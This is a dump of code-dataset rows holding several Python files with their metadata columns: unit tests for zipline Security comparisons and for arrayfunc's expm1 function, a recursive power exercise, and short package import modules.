hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d6605fb6aa0b0428f034e1151a95d0debf0a5bd6 | 1,149 | py | Python | tests/test_security_object.py | dalejung/zipline | e19f02a2ecb24baebddbeb17060d7b068c710e4d | [
"Apache-2.0"
] | null | null | null | tests/test_security_object.py | dalejung/zipline | e19f02a2ecb24baebddbeb17060d7b068c710e4d | [
"Apache-2.0"
] | null | null | null | tests/test_security_object.py | dalejung/zipline | e19f02a2ecb24baebddbeb17060d7b068c710e4d | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from zipline.assets._securities import Security
class TestSecurityRichCmp(TestCase):
def test_lt(self):
self.assertTrue(Security(3) < Security(4))
self.assertFalse(Security(4) < Security(4))
self.assertFalse(Security(5) < Security(4))
def test_le(self):
self.assertTrue(Security(3) <= Security(4))
self.assertTrue(Security(4) <= Security(4))
self.assertFalse(Security(5) <= Security(4))
def test_eq(self):
self.assertFalse(Security(3) == Security(4))
self.assertTrue(Security(4) == Security(4))
self.assertFalse(Security(5) == Security(4))
def test_ge(self):
self.assertFalse(Security(3) >= Security(4))
self.assertTrue(Security(4) >= Security(4))
self.assertTrue(Security(5) >= Security(4))
def test_gt(self):
self.assertFalse(Security(3) > Security(4))
self.assertFalse(Security(4) > Security(4))
self.assertTrue(Security(5) > Security(4))
def test_type_mismatch(self):
self.assertIsNotNone(Security(3) < 'a')
self.assertIsNotNone('a' < Security(3))
| 33.794118 | 52 | 0.644909 | 138 | 1,149 | 5.311594 | 0.195652 | 0.245566 | 0.177353 | 0.122783 | 0.740791 | 0.740791 | 0.740791 | 0.740791 | 0.665757 | 0.665757 | 0 | 0.035204 | 0.208877 | 1,149 | 33 | 53 | 34.818182 | 0.771177 | 0 | 0 | 0 | 0 | 0 | 0.001741 | 0 | 0 | 0 | 0 | 0 | 0.653846 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d673ed5838562523a0ab38fe0e6db3649dae24f4 | 180 | py | Python | ADVANCED_MODULE/05_Functions_Advanced/LAB/06_Recursive_Power.py | sleepychild/SoftUni_SE | ae94488befb6de8b74ffdcb14ed6470739a67786 | [
"MIT"
] | null | null | null | ADVANCED_MODULE/05_Functions_Advanced/LAB/06_Recursive_Power.py | sleepychild/SoftUni_SE | ae94488befb6de8b74ffdcb14ed6470739a67786 | [
"MIT"
] | 1 | 2022-01-15T10:33:56.000Z | 2022-01-15T10:33:56.000Z | ADVANCED_MODULE/05_Functions_Advanced/LAB/06_Recursive_Power.py | sleepychild/SoftUni_SE | ae94488befb6de8b74ffdcb14ed6470739a67786 | [
"MIT"
] | null | null | null | def recursive_power(number, power):
return number * recursive_power(number, power - 1) if power > 1 else number
print(recursive_power(2, 10))
print(recursive_power(10, 100))
| 25.714286 | 79 | 0.744444 | 27 | 180 | 4.814815 | 0.444444 | 0.430769 | 0.307692 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064935 | 0.144444 | 180 | 6 | 80 | 30 | 0.779221 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 8 |
d6770548cd1cd12f77e347616ca5c72e3326ccb3 | 124 | py | Python | pycspr/serialisation/json/cl_value/__init__.py | hboshnak/casper-python-sdk | 19db9bf3b4720d5b4e133463e5a32fd64f1c33ed | [
"Apache-2.0"
] | null | null | null | pycspr/serialisation/json/cl_value/__init__.py | hboshnak/casper-python-sdk | 19db9bf3b4720d5b4e133463e5a32fd64f1c33ed | [
"Apache-2.0"
] | null | null | null | pycspr/serialisation/json/cl_value/__init__.py | hboshnak/casper-python-sdk | 19db9bf3b4720d5b4e133463e5a32fd64f1c33ed | [
"Apache-2.0"
] | null | null | null | from pycspr.serialisation.json.cl_value.decoder import decode
from pycspr.serialisation.json.cl_value.encoder import encode
| 41.333333 | 61 | 0.870968 | 18 | 124 | 5.888889 | 0.611111 | 0.188679 | 0.433962 | 0.509434 | 0.641509 | 0.641509 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 124 | 2 | 62 | 62 | 0.913793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d6ce8eaf5468eca8dcbec8ddbb8ea26cf5f1b3ae | 111 | py | Python | fastapi_helpers/routes/middlewares/__init__.py | finalsa/fastapi-helpers | 3fc06e4445e29416876822d3f9485c65c51886cc | [
"MIT"
] | 2 | 2021-09-19T00:56:42.000Z | 2022-01-19T06:13:45.000Z | fastapi_helpers/routes/middlewares/__init__.py | finalsa/fastapi-helpers | 3fc06e4445e29416876822d3f9485c65c51886cc | [
"MIT"
] | 1 | 2021-11-27T18:05:08.000Z | 2021-12-24T02:42:11.000Z | fastapi_helpers/routes/middlewares/__init__.py | finalsa/fastapi-helpers | 3fc06e4445e29416876822d3f9485c65c51886cc | [
"MIT"
] | 1 | 2021-12-23T07:21:56.000Z | 2021-12-23T07:21:56.000Z | from .HeadersMiddleware import HeadersMiddleware
from .get_real_ip import get_real_ip, get_real_ip_from_headers | 55.5 | 62 | 0.900901 | 17 | 111 | 5.411765 | 0.411765 | 0.228261 | 0.293478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072072 | 111 | 2 | 62 | 55.5 | 0.893204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d6d600c8968ec4e7ff3aa81d5a261feb4b36a4a8 | 208 | py | Python | data/__init__.py | sin-en-2009/NeuRec | 74fe762f8dfb911e5b736f98e9cbec1df52acb10 | [
"MIT"
] | 1 | 2021-07-14T23:11:43.000Z | 2021-07-14T23:11:43.000Z | data/__init__.py | sin-en-2009/NeuRec | 74fe762f8dfb911e5b736f98e9cbec1df52acb10 | [
"MIT"
] | null | null | null | data/__init__.py | sin-en-2009/NeuRec | 74fe762f8dfb911e5b736f98e9cbec1df52acb10 | [
"MIT"
] | null | null | null | from .parallel_sampler import PointwiseSampler
from .parallel_sampler import PairwiseSampler
from .parallel_sampler import TimeOrderPointwiseSampler
from .parallel_sampler import TimeOrderPairwiseSampler
| 41.6 | 56 | 0.884615 | 20 | 208 | 9 | 0.4 | 0.266667 | 0.422222 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096154 | 208 | 4 | 57 | 52 | 0.957447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d6f45313d31a4e78839753aea1c2bc42175292e5 | 39,905 | py | Python | unittest/test_expm1.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | 2 | 2017-08-28T08:41:16.000Z | 2018-05-29T03:49:36.000Z | unittest/test_expm1.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | unittest/test_expm1.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
##############################################################################
# Project: arrayfunc
# Module: test_expm1.py
# Purpose: arrayfunc unit test.
# Language: Python 3.4
# Date: 09-Dec-2017.
# Ver: 06-Mar-2020.
#
###############################################################################
#
# Copyright 2014 - 2020 Michael Griffin <m12.griffin@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##############################################################################
"""This conducts unit tests for expm1.
"""
##############################################################################
import sys
import array
import itertools
import math
import operator
import platform
import copy
import unittest
import arrayfunc
##############################################################################
##############################################################################
# The following code is all auto-generated.
##############################################################################
class expm1_general_even_arraysize_without_simd_f(unittest.TestCase):
"""Test for basic general function operation.
test_template_noparams
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
if 'even' == 'even':
testdatasize = 160
if 'even' == 'odd':
testdatasize = 159
paramitersize = 5
xdata = [x for x,y in zip(itertools.cycle([0.0,1.0,2.0,3.0,4.0,5.0,6.0,7.0,8.0,9.0]), range(testdatasize))]
self.data = array.array('f', xdata)
self.dataout = array.array('f', [0]*len(self.data))
self.limited = len(self.data) // 2
# The expected results.
self.expected = [math.expm1(x) for x in self.data]
# The expected results when the maxlen parameter is used.
self.expectedlimiteddata = self.expected[0:self.limited] + list(self.data)[self.limited:]
# The same, but where dataout is used as one of the sources.
self.expectedlimiteddataout = self.expected[0:self.limited] + list(self.dataout)[self.limited:]
########################################################
def test_expm1_basic_array_none_a1(self):
"""Test expm1 as *array-none* for basic function - Array code f.
"""
arrayfunc.expm1(self.data )
for dataoutitem, expecteditem in zip(list(self.data), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_none_a2(self):
"""Test expm1 as *array-none* for basic function with matherrors=True - Array code f.
"""
arrayfunc.expm1(self.data, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.data), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_none_a3(self):
"""Test expm1 as *array-none* for basic function with maxlen - Array code f.
"""
arrayfunc.expm1(self.data, maxlen=self.limited )
for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_none_a4(self):
"""Test expm1 as *array-none* for basic function with maxlen and matherrors=True - Array code f.
"""
arrayfunc.expm1(self.data, maxlen=self.limited, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b1(self):
"""Test expm1 as *array-array* for basic function - Array code f.
"""
arrayfunc.expm1(self.data, self.dataout )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b2(self):
"""Test expm1 as *array-array* for basic function with matherrors=True - Array code f.
"""
arrayfunc.expm1(self.data, self.dataout, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b3(self):
"""Test expm1 as *array-array* for basic function with maxlen - Array code f.
"""
arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b4(self):
"""Test expm1 as *array-array* for basic function with maxlen and matherrors=True - Array code f.
"""
arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_param_errors_f(unittest.TestCase):
"""Test for invalid parameters.
param_invalid_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.floatarray = array.array('f', [0.0,1.0,2.0,3.0,4.0,5.0,6.0,7.0,8.0,9.0])
arraysize = len(self.floatarray)
self.dataout = array.array('f', itertools.repeat(0.0, arraysize))
# Create some integer array equivalents.
self.intarray = array.array('i', [int(x) for x in self.floatarray])
self.intdataout = array.array('i', [int(x) for x in self.dataout])
########################################################
def test_expm1_array_none_a1(self):
"""Test expm1 as *array-none* for integer array - Array code f.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.intarray)
########################################################
def test_expm1_array_none_b1(self):
"""Test expm1 as *array-none* for matherrors='a' - Array code f.
"""
# Copy the array so we don't change the original data.
floatarray = copy.copy(self.floatarray)
# This version is expected to pass.
arrayfunc.expm1(floatarray, matherrors=True)
floatarray = copy.copy(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(floatarray, matherrors='a')
########################################################
def test_expm1_array_none_b2(self):
"""Test expm1 as *array-none* for maxlen='a' - Array code f.
"""
# Copy the array so we don't change the original data.
floatarray = copy.copy(self.floatarray)
testmaxlen = len(floatarray) // 2
# This version is expected to pass.
arrayfunc.expm1(floatarray, maxlen=testmaxlen)
floatarray = copy.copy(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(floatarray, maxlen='a')
########################################################
def test_expm1_array_array_c1(self):
"""Test expm1 as *array-array* for integer array - Array code f.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.intarray, self.dataout)
########################################################
def test_expm1_array_array_c2(self):
"""Test expm1 as *array-array* for integer output array - Array code f.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.floatarray, self.intdataout)
########################################################
def test_expm1_array_array_c3(self):
"""Test expm1 as *array-array* for integer input and output array - Array code f.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.intarray, self.intdataout)
########################################################
def test_expm1_array_num_array_d1(self):
"""Test expm1 as *array-num-array* for matherrors='a' - Array code f.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout, matherrors=True)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.floatarray, self.dataout, matherrors='a')
########################################################
def test_expm1_array_array_d2(self):
"""Test expm1 as *array-array* for maxlen='a' - Array code f.
"""
testmaxlen = len(self.floatarray) // 2
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout, maxlen=testmaxlen)
floatarray = copy.copy(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.floatarray, self.dataout, maxlen='a')
########################################################
def test_expm1_no_params_e1(self):
"""Test expm1 with no parameters - Array code f.
"""
with self.assertRaises(TypeError):
arrayfunc.expm1()
##############################################################################
##############################################################################
class expm1_general_even_arraysize_without_simd_d(unittest.TestCase):
"""Test for basic general function operation.
test_template_noparams
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
if 'even' == 'even':
testdatasize = 160
if 'even' == 'odd':
testdatasize = 159
paramitersize = 5
xdata = [x for x,y in zip(itertools.cycle([0.0,1.0,2.0,3.0,4.0,5.0,6.0,7.0,8.0,9.0]), range(testdatasize))]
self.data = array.array('d', xdata)
self.dataout = array.array('d', [0]*len(self.data))
self.limited = len(self.data) // 2
# The expected results.
self.expected = [math.expm1(x) for x in self.data]
# The expected results when the maxlen parameter is used.
self.expectedlimiteddata = self.expected[0:self.limited] + list(self.data)[self.limited:]
# The same, but where dataout is used as one of the sources.
self.expectedlimiteddataout = self.expected[0:self.limited] + list(self.dataout)[self.limited:]
########################################################
def test_expm1_basic_array_none_a1(self):
"""Test expm1 as *array-none* for basic function - Array code d.
"""
arrayfunc.expm1(self.data )
for dataoutitem, expecteditem in zip(list(self.data), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_none_a2(self):
"""Test expm1 as *array-none* for basic function with matherrors=True - Array code d.
"""
arrayfunc.expm1(self.data, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.data), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_none_a3(self):
"""Test expm1 as *array-none* for basic function with maxlen - Array code d.
"""
arrayfunc.expm1(self.data, maxlen=self.limited )
for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_none_a4(self):
"""Test expm1 as *array-none* for basic function with maxlen and matherrors=True - Array code d.
"""
arrayfunc.expm1(self.data, maxlen=self.limited, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b1(self):
"""Test expm1 as *array-array* for basic function - Array code d.
"""
arrayfunc.expm1(self.data, self.dataout )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b2(self):
"""Test expm1 as *array-array* for basic function with matherrors=True - Array code d.
"""
arrayfunc.expm1(self.data, self.dataout, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b3(self):
"""Test expm1 as *array-array* for basic function with maxlen - Array code d.
"""
arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_basic_array_array_b4(self):
"""Test expm1 as *array-array* for basic function with maxlen and matherrors=True - Array code d.
"""
arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited, matherrors=True )
for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_param_errors_d(unittest.TestCase):
"""Test for invalid parameters.
param_invalid_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.floatarray = array.array('d', [0.0,1.0,2.0,3.0,4.0,5.0,6.0,7.0,8.0,9.0])
arraysize = len(self.floatarray)
self.dataout = array.array('d', itertools.repeat(0.0, arraysize))
# Create some integer array equivalents.
self.intarray = array.array('i', [int(x) for x in self.floatarray])
self.intdataout = array.array('i', [int(x) for x in self.dataout])
########################################################
def test_expm1_array_none_a1(self):
"""Test expm1 as *array-none* for integer array - Array code d.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.intarray)
########################################################
def test_expm1_array_none_b1(self):
"""Test expm1 as *array-none* for matherrors='a' - Array code d.
"""
# Copy the array so we don't change the original data.
floatarray = copy.copy(self.floatarray)
# This version is expected to pass.
arrayfunc.expm1(floatarray, matherrors=True)
floatarray = copy.copy(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(floatarray, matherrors='a')
########################################################
def test_expm1_array_none_b2(self):
"""Test expm1 as *array-none* for maxlen='a' - Array code d.
"""
# Copy the array so we don't change the original data.
floatarray = copy.copy(self.floatarray)
testmaxlen = len(floatarray) // 2
# This version is expected to pass.
arrayfunc.expm1(floatarray, maxlen=testmaxlen)
floatarray = copy.copy(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(floatarray, maxlen='a')
########################################################
def test_expm1_array_array_c1(self):
"""Test expm1 as *array-array* for integer array - Array code d.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.intarray, self.dataout)
########################################################
def test_expm1_array_array_c2(self):
"""Test expm1 as *array-array* for integer output array - Array code d.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.floatarray, self.intdataout)
########################################################
def test_expm1_array_array_c3(self):
"""Test expm1 as *array-array* for integer input and output array - Array code d.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.intarray, self.intdataout)
########################################################
def test_expm1_array_num_array_d1(self):
"""Test expm1 as *array-num-array* for matherrors='a' - Array code d.
"""
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout, matherrors=True)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.floatarray, self.dataout, matherrors='a')
########################################################
def test_expm1_array_array_d2(self):
"""Test expm1 as *array-array* for maxlen='a' - Array code d.
"""
testmaxlen = len(self.floatarray) // 2
# This version is expected to pass.
arrayfunc.expm1(self.floatarray, self.dataout, maxlen=testmaxlen)
floatarray = copy.copy(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
arrayfunc.expm1(self.floatarray, self.dataout, maxlen='a')
########################################################
def test_expm1_no_params_e1(self):
"""Test expm1 with no parameters - Array code d.
"""
with self.assertRaises(TypeError):
arrayfunc.expm1()
##############################################################################
##############################################################################
class expm1_nandata_exceptions_nan_f(unittest.TestCase):
"""Test for basic general function operation.
nan_data_errorchecked_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
